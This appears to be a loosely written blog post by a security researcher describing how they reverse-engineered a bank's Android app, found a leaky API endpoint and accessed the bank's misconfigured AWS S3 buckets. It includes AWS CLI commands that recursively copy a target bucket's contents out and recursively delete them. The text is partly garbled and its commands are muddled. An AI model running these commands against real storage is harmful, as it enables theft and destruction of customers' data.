All too often, when security researchers or hackers find personal information online, it’s sitting in an unsecured Amazon S3 bucket. We see this time and time again, often with extremely troubling results.
Hundreds of millions of user records left sitting in plain sight. Nearly eight hundred thousand applications for birth certificate copies ripe for the taking. Tens of thousands of bank app users’ private info just practically begging to be stolen. Incidents like these — and there are many, many more — are all tied together by one cloud computing platform: Amazon Web Services.
So what’s going on here? Are customers simply misusing the product, or is there some sort of design flaw that makes the accidental exposure of data inevitable?
This is why I am willing to share my favorite hack and also trying to explain the sometimes confusing world of configured buckets, security experts are more than happy to share their expertise.
POORLY WRITTEN API endpoint
I downloaded the mobile app to my android device, pulled the apk to my virtual machine and did a reverse engineering on the apk file patched the app, and then recompiled it before install the patched apk on my android emulator using various tools and attack methods listed below.
Zip sudo apt install zip unzip
SQLite3 sudo apt-get install sqlite3 sudo apt-get install sqlitebrowser
Adb sudo apt-get install adb Pip/Python apt install python3-pip
I did a series on android security on my YouTube channel here https://www.youtube.com/c/StephenOgu
EXPLOIT AT THE API LEVEL
I discovered an endpoint the i could exploit and extract all the users from the database. this exploit reviewed a records of more than 10k users PII with other sensitive information.
POST Host: api.bankapi.io/prod/proximitylist
Called the Bank explained in details the exposure of this credentials in the public
HACKING THE BANK S3 BUCKETS
CLI into AWS S3 Bucket of the Target
aws s3 ls
aws s3 cp s3://s3Bucket-Name /home/kali/Desktop/folderName — recursive
aws s3 rm s3://s3Bucket-Name /home/kali/Desktop/folderName — recursive
Reconfigure the instance metadata service from v1 to v2
Instance Metadata Service Version 1 (IMDSv1) — a request/response method
reconfigure to Instance Metadata Service Version 2 (IMDSv2) — a session-oriented method